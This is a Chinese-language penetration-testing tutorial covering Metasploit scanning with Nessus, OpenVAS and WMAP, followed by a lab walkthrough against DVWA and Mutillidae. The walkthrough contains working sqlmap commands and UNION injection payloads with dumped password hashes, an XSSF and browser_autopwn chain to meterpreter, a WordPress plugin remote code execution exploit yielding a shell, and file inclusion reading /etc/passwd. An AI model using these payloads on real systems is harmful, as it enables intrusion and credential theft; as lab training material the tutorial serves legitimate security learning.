Metaspliot进行漏洞扫描

Metaspliot进行漏洞扫描

Metasploit框架是Metasploit项目中最著名的创做，是一个软件开发、测试和利用漏洞的平台。它能够用来建立安全测试工具开发的模块，也可利用模块做为一个渗透测试系统。最初是由HD Moore在2003年建立做为一种便携式网络工具包。它是全部的安全研究人员和黑客之间最受欢迎的渗透测试工具之一。除了渗透测试，该工具还可以在网络和Web应用程序中执行一个很好的漏洞评估。它有一些著名的安全漏洞扫描器如 Nessus、 Nexpose、 open VAS 和 WMAP 内置的插件。

在本文中，咱们要查看如何使用 Metasploit 内置插件来执行网络和 web 应用程序的脆弱性评估。首先咱们将启动Nessus，跳转到msfconsole，咱们将看到如何在Backtrack中安装 Nessus。它是很简单的 ；只需执行一步一步的命令：

首先从Nessus其官方网站上下载Linux 版本并安装它。而后注册一个免费的许可证。在成功安装后 Nessus，添加一个用户，经过键入如下命令：/opt/nessus/sbin/nessus-adduser

触发命令后，它将要求登陆用户名和用户密码。为用户的特权，只需按照选项完成它。

如今咱们将注册 Nessus 得到许可证。因此输入 /opt/nessus/bin/nessus-fetch –register <YOUR LICENSE>

注册以后，它会从它的官方网站开始下载全部最新的插件。这将须要一些时间来完成整个安装。在此以后，它将能够随时使用。

因此，让咱们启动 msfconsole 和 load nessus .

正如咱们能够在上图中看到，咱们的Nessus插件加载成功。如今，输入nessus_help，它会列出全部的Nessus的命令。

如今，咱们将链接到Nessus从咱们的本地主机开始扫描。用于链接到localhost，使用的命令是nessus_connect <你的用户名>：<你的密码>@localhost: 8834 < ok >，在这里咱们使用的是nessus_connect rohit:toor@localhost:8834 ok .

正如咱们所看到的，咱们的Nessus进行身份验证。如今，咱们将检查Nessus的扫描策略。对于这一点，咱们输入nessus_policy_list。

两个策略??，"Internal Network Scan"和"External Network Scan"可供选择（外部网络和内部网络)。首先是用于扫描内部网络漏洞，而后是用于扫描外部网络漏洞。

如今，咱们要扫描目标主机。首先，咱们要建立一个新的扫描。使用的命令是：nessus_scan_new <policy ID> <scan NAME> <Target IP>，例如，这里咱们使用的是nessus_scan_new 2 NEW_SCAN 192.168.0.101,192.168.0.102

咱们能够经过输入nessus_scan_status检查扫描过程的状态，将会显示咱们的扫描过程当中，状态是否已经完成或没有。在咱们的列子，扫描仍然在运行，因此咱们将等待一段时间。

过了一下子，咱们的扫描完成。如今，咱们将经过输入nessus_report_list检查咱们的报告，以下图所示，咱们的扫描完成。

若要打开该报表，咱们使用命令 nessus_report_hosts < 报告 ID > ； 例如，在这里咱们使用 nessus_report_hosts ff2b1531-6c18-0198-9029-59ddcdb6fc3f26566c9ad609d831：

在上面的截图中咱们能够看到主机 IP 192.168.0.101 的结果中有总共 85 严重性漏洞。这意味着安全漏洞的总数量是 85。

如下是不一样漏洞的分类：

? Sev 0 表示高层次的漏洞;有0个。

? Sev 1 表示中等程度的漏洞;有53个。

? Sev 2 表示低级别的漏洞;有20个。

? Sev 3 表示信息漏洞;有12。

咱们能够经过使用命令nessus_report_hosts_ports <Target IP> <Report ID>会看到漏洞的详细协议名称和服务，例如，这里咱们使用的是nessus_report_host_ports 192.168.0.101 ff2b1531-6c18-0198-9029-59ddcdb6fc3f26566c9ad609d831：

如今，咱们将这份报告发送到Nessus的控制台，因此在MSF中输入：nessus_report_get ff2b1531-6c18-0198-9029 59ddcdb6fc3f26566c9ad609d831

正如在上面的图中能够看到，咱们的报告已成功导入。如今，经过Nessus的Web控制台登录，咱们可以看到咱们导入的报告。

   

Metaspliot进行漏洞扫描(2)-Openvas46+

在这篇文章中，咱们将看到如何使用Metasploit的内置插件来执行网络和Web应用程序的脆弱性评估。首先，咱们将启动OpenVAS和msfconsole以前，你必须在你的系统中安装OpenVAS。在安装过程当中给出的Backtrack的官方网站 http://www.backtrack-linux.org/wiki/index.php/OpenVas。只要按照步骤。如今咱们开始进入咱们的话题，如何经过OpenVAS进行漏洞评估。

要运行OpenVAS，在msfconsole输入load openvas，它会从它的数据库中加载并打开VAS插件。

如今，输入openvas_help，它会显示OpenVAS全部的命令。

咱们要经过命令openvas_connect链接到OpenVAS服务器，它会显示完整的使用命令，这是openvas_connect username password host port <ssl-confirm> 用于链接到服务器。在个人状况下，命令是openvas_connect rohit toor localhost 9390 ok

这咱们能够在上图中看到，咱们的OpenVAS链接成功。如今，咱们将建立扫描的目标。建立目标的命令是openvas_target_create <scan NAME> <target IP> <any comments>。在下面的图中，咱们能够看到个人扫描名称是windows7的，目标是192.168.0.101和注释是new_scan，因此命令是openvas_target_create"windows7″ 192.168.0.101″new_scan"

建立目标后，咱们但愿看到OpenVAS的扫描配置列表，那么请输入openvas_config_list。

OpenVAS 有四种类型的扫描配置 ； 咱们将按要求选择此选项。下一步输入 openvas_target_list ，它将显示您建立的目标。

如今咱们有一个目标，咱们也看到了扫描的配置，因此咱们将建立一个任务来扫描咱们的目标机器。

   

要建立任务，该命令是openvas_task_create <scanname> <COMMENT> <scanconfig ID> <targetID>

例如，在上面的图中，咱们输入openvas_task_create windows7 new_scan 3 1

咱们能够看到，咱们建立的任何和任务ID，咱们的目标机器为0。如今，经过输入openvas_task_start <taskID>启动任务。这里咱们使用openvas_task_start 0

正如咱们所看到的，启动命令后，咱们提交请求，这意味着咱们的扫描如今应该开始。让咱们经过输入open_vas_list检查，它代表咱们的扫描状态运行和进步是1，这意味着1％。

等待一段时间，并再次检查进度。

如今进度是80％，这意味着它几乎完整。当扫描完成后，进度将显示-1。和状态显示"Done"。

如今咱们的扫描完成，因此咱们能够下载该报告；输入 openvas_report_list ，它将显示数据库中的全部报告。

有几种格式供下载的报告。输入openvas_format_list，它会列出全部可用的格式。

选择格式后，咱们就可使用这个命令下载报告：openvas_report_download <report id> <format id> <path for saving report> <report name>。这里咱们使用openvas_report_download 1 5 /root/Desktop report

该OpenVAS报告格式有一个bug：每当我试图下载PDF或XML格式，它给出了空白报表，因此我再次下载该报告的HTML格式，这种格式是工做正常。

Metaspliot进行漏洞扫描(3)-wamp

在前面的文章中，咱们学会了如何使用OpenVAS插件来进行网络脆弱性评估。在这种延续中，咱们将看到如何使用WMAP插件来执行Web应用程序漏洞评估。

WMAP最初是从一个名为SQLMap的工具建立了一个功能丰富的Web漏洞扫描程序。该工具集成了Metasploit工具，使咱们可以从框架内进行web应用扫描。

启动msfconsole和load WMAP

它会从它的数据库中加载并打开WMAP插件。如今，输入help，它会显示WMAP全部使用的命令。

正如在上面的图中能够看出，wmap_sites命令是用来管理网站，因此咱们要使用这个命令。输入wmap_sites -H ，它会显示用于管理全部网站使用的选项。

在上图中，咱们能够看到，-a选项添加一个站点。所以，让咱们使用这个选项添加一个站点。输入wmap_site -a <目标>。在这里，咱们在本地机器上托管的Web应用程序。这就是为何咱们的目标IP是一个本地IP地址：wmap_sites -a http://192.168.0.102

一旦建立了该网站，咱们能够检查咱们添加的站点，经过输入 wmap_sites-l 将会列出这些。

咱们网站已添加，如今咱们将添加目标。在第一次使用输入 wmap_targets -h 命令来列出全部 wmap_targets 用法选项。

正如咱们能够在使用选项看到，咱们能够经过两种方式添加咱们的目标。一个是-T，为此咱们必须提供目标URL。若是咱们使用-D，咱们必须给出目标站点ID。在这里，咱们将使用-d选项。所以咱们的命令是wmap_targets -D 0

添加目标ID后，咱们能够看到它加载的目标地址。如今咱们能够检查列表，查看咱们的目标是增长，输入wmap_targets -L

如今一切都准备好了，目标被成功添加，咱们能够运行咱们的WMAP用于扫描Web应用程序。扫描命令wmap_run，可是，在运行此命令以前，检查全部的使用方式选项。输入wmap_run-H

咱们能够在选项中看到，-t 是为检查全部启用的模块，用于扫描。因此输入 wmap_run-t

触发该命令后，它会显示全部不一样的测试模块。

如今，键入wmap_run -E ，它会开始扫描全部启用的模块。

这将须要一些时间，具体取决于有多大的应用。扫描完成后，它会看起来像这样。

如今，咱们能够经过输入vulns查询全部漏洞。

咱们能够看到在上图中，在检测到该应用程序上启用跟踪方法和脆弱性引用 CVE ID、 OSVD、 BID等，都显示。

本文由InfoSecLab 整理翻译，若有翻译和编辑错误，请联系管理员，咱们将尽快处理，转载请保留版权，谢谢，但愿本文对你有所帮助。

MSF扫描结合web渗透攻击技术

1.跨站脚本

反射型：利用邮件给受害者发送个恶意连接，受害者点击时，恶意连接指向的服务器将注入的文件"反射"到受害者的浏览器上，并执行恶意文件。

存储型：利用论坛、博客等web站点，将恶意脚本连同正常信息一块儿注入帖子内容中，并随帖子一块儿存储到论坛、博客服务器，当有用户浏览该帖子时，恶意脚本将在浏览器上运行。

DOM型：构造一个URL连接，连接上包含有javascript等脚本，当受害者点击这个URL时，将请求并执行脚本。

 

2.使用metasploit自带的wmap web扫描器

msf > db_connect -y /opt/metasploit/config/database.yml

msf > load wmap

 

.-.-.-..-.-.-..---..---.

| | | || | | || | || |-'

`-----'`-'-'-'`-^-'`-'

[WMAP 1.5.1] ===  et [  ] metasploit.com 2012

[*] Successfully loaded plugin: wmap

 

wmap Commands

=============

 

    Command       Description

    -------       -----------

    wmap_modules  Manage wmap modules

    wmap_nodes    Manage nodes

    wmap_run      Test targets

    wmap_sites    Manage sites

    wmap_targets  Manage targets

    wmap_vulns    Display web vulns

 

添加目标网站

msf > wmap_sites -a http://10.10.10.129

 

msf > wmap_sites -l

 

添加扫描目标 

msf > wmap_targets -t http://10.10.10.129

 

查看将使用的模块

msf > wmap_run -t

 

扫描并进行攻击

msf > wmap_run -e

 

[*] 10.10.10.129 (Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_python/3.3.1 Python/2.6.5 mod_perl/2.0.4 Perl/v5.10.1) WebDAV disabled.

[*] Module auxiliary/scanner/http/robots_txt

[*] [10.10.10.129] /robots.txt found

 

服务器的信息和敏感文件都找到了

 

再经过vulns查看漏洞信息

msf > vulns

[*] Time: 2013-10-22 00:56:24 UTC Vuln: host=10.10.10.129 name=HTTP Trace Method Allowed refs=CVE-2005-3398,CVE-2005-3498,OSVDB-877,BID-11604,BID-9506,BID-9561 

[*] Time: 2013-10-22 00:06:40 UTC Vuln: host=10.10.10.130 name=Microsoft Server Service Relative Path Stack Corruption refs=CVE-2008-4250,OSVDB-49243,MSB-MS08-067,URL-http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos 

 

结果仍是不错的。

 

metasploit的渗透模块在module中的文件夹下，主要集中在exploit/unix/webapp  exploit/windows/http  exploit/multi/http.

 

3.开源的web漏洞扫描工具

wapiti 对sql注入的扫描准确度排名第一

w3af 功能强大，配置繁琐

sandcat 对XSS检测效率最好

burp suite web渗透利器  

 

4.扫描神器w3af

支持读入配置好的脚本文件，也能够将下面一段直接复制进去

plugins

bruteforce

bruteforce formAuthBrute

bruteforce config formAuthBrute

set passwdFile True

set usersFile True

back

audit xss,sqli

discovery webSpider

discovery config webSpider

set onlyForward True

back

back

target

set target http://www.dvssc.com/dvwa/index.php

back

plugins

output htmlFile

output config htmlFile

set verbose True

set fileName aa.html

back

back

start

 

 

结果以下

SQL injection in a MySQL database was found at: "http://www.dvssc.com/dvwa/login.php", using HTTP method POST. The sent post-data was: "username=d'z"0&Login=Login&password=FrAmE30.". The modified parameter was "username". This vulnerability was found in the request with id 311.

 

URL : http://www.dvssc.com/dvwa/login.php

Severity : High

 

值得一提的是：w3af还有不少小工具保存在tools目录下，如base64decode,md5hash等。

 

 

5.SQL注入漏洞的探测

登录语句通常为select * from * where user='**' and pass='**'

改为这样就直接绕过了

select * from * where user='admin' or '1=1'and pass='**' 即输入admin' or '1=1

 

里面有个专门用来学习sql注入的网页，咱们试试sqlmap

root@bt:~# cd /pentest/database/sqlmap

 

在使用以前咱们须要知道referer 和cookie的值

可使用火狐的tamperdata，个人火狐版本较高，这个不兼容，这里使用的是wireshark

 

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#' --cookie='security=low; PHPSESSID=qjqe7ht1bi9davum40hufaau45'

 

[10:29:07] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable 

[10:29:07] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable

[10:29:42] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

 

得到信息较详细了

 

获取数据库名

./sqlmap.py -u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#' --cookie='security=low; PHPSESSID=qjqe7ht1bi9davum40hufaau45' --dbs -v 0

 

[10:38:55] [WARNING] reflective value(s) found and filtering out

available databases [2]:

[*] dvwa

[*] information_schema  mysql默认的

 

获取表名

./sqlmap.py -u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#' --cookie='security=low; PHPSESSID=qjqe7ht1bi9davum40hufaau45' -D dvwa --tables

[10:41:17] [WARNING] reflective value(s) found and filtering out

Database: dvwa

[2 tables]

+-----------+

| guestbook |

| users     |

+-----------+

 

获取列名

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#' --cookie='security=low; PHPSESSID=qjqe7ht1bi9davum40hufaau45' -D dvwa --tables -T users --columns

Database: dvwa

Table: users

[6 columns]

+------------+-------------+

| Column     | Type        |

+------------+-------------+

| avatar     | varchar(70) |

| first_name | varchar(15) |

| last_name  | varchar(15) |

| password   | varchar(32) |

| user       | varchar(15) |

| user_id    | int(6)      |

+------------+-------------+

 

导出password列的内容

./sqlmap.py -u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#' --cookie='security=low; PHPSESSID=qjqe7ht1bi9davum40hufaau45' -D dvwa --tables -T users --columns --dump

 

recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [Y/n/q] n

Database: dvwa

Table: users

[5 entries]

+---------+---------+-------------------------------------------------+----------------------------------+-----------+------------+

| user_id | user    | avatar                                          | password                        | last_name | first_name |

+---------+---------+-------------------------------------------------+----------------------------------+-----------+------------+

| 1       | admin   | http://owaspbwa/dvwa/hackable/users/admin.jpg   | 21232f297a57a5a743894a0e4a801fc3 | admin     | admin      |

| 2       | gordonb | http://owaspbwa/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 | Brown     | Gordon     |

| 3       | 1337    | http://owaspbwa/dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b | Me        | Hack       |

| 4       | pablo   | http://owaspbwa/dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 | Picasso   | Pablo      |

| 5       | smithy  | http://owaspbwa/dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 | Smith     | Bob        |

+---------+---------+-------------------------------------------------+----------------------------------+-----------+------------+

 

剩下的就是破解MD5值了

 

值得一提的是，sqlmap 还支持经过数据库注入一个交互的shell

 

root@bt:/pentest/database/sqlmap# ./sqlmap.py -h | grep shell

    --os-shell          Prompt for an interactive operating system shell

    --os-pwn            Prompt for an out-of-band shell, meterpreter or VNC

--os-shell 提供四种不一样的shell（ASP,ASPX,PHP,JSP）

 

咱们再试试手工注入

输入1时

ID: 1

First name: admin

Surname: admin

 

说明这是个查询 语句相似于： select firstname,surname from table where id='1'

 

输入' or '1'='1'#

看到全部的结果

 

输入1' order by 3#  出错

说明表里面只有两列

 

mysql有个默认的数据库information_schema,里面有个叫tables的表，里面保存了整个Mysql全部库、表的信息

table_schema和table_name是其中表示库名和表名的两列

' union select 1,table_name from information_schema.tables#

 

这样咱们就获得了除系统自带表之外的表了，这里最后两个是用户本身添加的

ID: ID: ' union select table_schema,table_name from information_schema.tables#

First name: dvwa

Surname: guestbook

 

ID: ID: ' union select table_schema,table_name from information_schema.tables#

First name: dvwa

Surname: users

 

很轻松的获得了库名和表名，咱们关心的是users表

 

mysql默认的数据库information_schema有张表还保存了每张表的列名，表名为columns

意味着咱们还能查询到users表的全部列名

' union select 1,column_name from information_schema.columns where table_name='users'#

 

ID: ' union select 1,column_name from information_schema.columns where table_name='users'#

First name: 1

Surname: user_id

 

ID: ' union select 1,column_name from information_schema.columns where table_name='users'#

First name: 1

Surname: first_name

 

ID: ' union select 1,column_name from information_schema.columns where table_name='users'#

First name: 1

Surname: last_name

 

ID: ' union select 1,column_name from information_schema.columns where table_name='users'#

First name: 1

Surname: user

 

ID: ' union select 1,column_name from information_schema.columns where table_name='users'#

First name: 1

Surname: password

 

ID: ' union select 1,column_name from information_schema.columns where table_name='users'#

First name: 1

Surname: avatar

 

那么就剩下获取字段的内容了

' union select user,password from dvwa.users#

 

ID: ' union select user,password from dvwa.users#

First name: admin

Surname: 21232f297a57a5a743894a0e4a801fc3

 

ID: ' union select user,password from dvwa.users#

First name: gordonb

Surname: e99a18c428cb38d5f260853678922e03

 

ID: ' union select user,password from dvwa.users#

First name: 1337

Surname: 8d3533d75ae2c3966d7e0d4fcc69216b

 

ID: ' union select user,password from dvwa.users#

First name: pablo

Surname: 0d107d09f5bbe40cade3de5c71e9e9b7

 

ID: ' union select user,password from dvwa.users#

First name: smithy

Surname: 5f4dcc3b5aa765d61d8327deb882cf99

 

ID: ' union select user,password from dvwa.users#

First name: user

Surname: ee11cbb19052e40b07aac0ca060c23ee

 

大功告成！

 

 

6.XSS漏洞探测 W3AF

 

plugins

audit xss

discovery webSpider

discovery config webSpider

set onlyForward True

back

back

target

set target http://www.dvssc.com/mutillidae/?page=add-to-your-blog.php

back

plugins

output htmlFile

output config htmlFile

set verbose True

set fileName mutillidae.html

back

back

start

 

结果是：

Cross Site Scripting was found at: "http://www.dvssc.com/mutillidae/index.php?page=add-to-your-blog.php", using HTTP method POST. The sent post-data was: "input_from_form=

 

URL : http://www.dvssc.com/mutillidae/index.php

Severity : Medium

 

7.web应用程序漏洞探测

wXf是一个web应用漏洞扫描和攻击工具

https://github.com/WebExploitationFramework/wxf

 

BT5的Ruby版本有点低，在kali上能很好的运行

 

这里面支持一个wordpress的扫描模块

 

8.XSS跨站攻击

javascript可以很好的增长网页的丰富多样性，于是使用仍是比较普遍的。

想成功执行一个XSS，须要两个步骤：

1.攻击者发送的数据没有被过滤或是删除。

2.web应用返回的数据没有通过编码。

 

对于一个安全的web应用来讲，返回页面的每个特殊字符包括&  < > 、 /都应该通过编码，最好是进行16进制编码。

 

针对http://www.dvssc.com/dvwa/vulnerabilities/xss_r这个网站

当咱们输入

直接弹框XSS

很明显的一个反射式跨站漏洞。

 

而存储型的跨站攻击并不须要直接对网站的某个输入点进行输入，而是长期存储在web应用中并做为一个内容。

 

对于存储型的http://www.dvssc.com/dvwa/vulnerabilities/xss_s/

在发表文章的撰写文章并提交，在输入框中输入

而这个js里面就包括了获取session和cookie的代码。

 

当别人访问你的文章时，信息就被窃取了。

 

 

9.跨站脚本攻击框架XSSF

https://code.google.com/p/xssf/downloads/list下载

把里面的四个文件夹data,lib,modules和plugin合并到/opt/framework/msf3里面的文件夹

msf > load xssf

 

msf > xssf_urls

[+] XSSF Server : 'http://192.168.0.4:8888/' or 'http://:8888/'

[+] Generic XSS injection: 'http://192.168.0.4:8888/loop' or 'http://:8888/loop'

[+] XSSF test page : 'http://192.168.0.4:8888/test.html' or 'http://:8888/test.html'

 

以上就是咱们的攻击配置文件

 

当咱们把连接 http://192.168.0.4:8888 经过存储式跨站加入到博客里面，当第三方浏览这个博客同时点击这个连接时，就能看到点击者的信息。

 

查看被攻击者的信息

msf > xssf_victims

 

查看具体主机

msf > xssf_information 4

 

若是是低版本的IE浏览器

咱们可使用相关的攻击模块

msf > use auxiliary/server/browser_autopwn

 

接着是使用metasploit的反弹回连模块

msf >jobs

 

msf >xssf_exploit 2 14

最后获得一个meterpreter

 

10.命令注入攻击

wordpress zingiri plugin渗透代码，是一个php脚本

固然前提是wordpress装有这个插件，而且还存在漏洞。

root@bt:~/Desktop# php exp.php 10.10.10.129 /wordpress/

 

+----------------------------------------------------------------------------------+

| Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit by EgiX |

+----------------------------------------------------------------------------------+

 

zingiri-shell# 

zingiri-shell# id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

 

获得了一个shell，可是这个shell和www-data这个帐号的权限是相同的，还不够高

root:x:0:0:root:/root:/bin/bash

www-data:x:33:33:www-data:/var/www:/bin/sh

 

11.文件包含和文件上传漏洞

针对文件包含漏洞的页面，也许改个参数你就能知道不少信息

http://192.168.0.3/dvwa/vulnerabilities/fi/?page=include.php

改为

http://192.168.0.3/dvwa/vulnerabilities/fi/?page=/etc/passwd

 

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:102::/home/syslog:/bin/false klog:x:102:103::/home/klog:/bin/false mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false landscape:x:104:122::/var/lib/landscape:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin postgres:x:106:109:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash messagebus:x:107:114::/var/run/dbus:/bin/false tomcat6:x:108:115::/usr/share/tomcat6:/bin/false user:x:1000:1000:user,,,:/home/user:/bin/bash polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false haldaemon:x:110:119:Hardware abstraction layer,,,:/var/run/hald:/bin/false pulse:x:111:120:PulseAudio daemon,,,:/var/run/pulse:/bin/false postfix:x:112:123::/var/spool/postfix:/bin/false 

 

这就有了不少信息了。

 

对于文件长传漏洞，上传特制的带有webshell的文件，而后将page=提成远程主机上webshell的url，这样就有了webshell，能够执行shell命令了。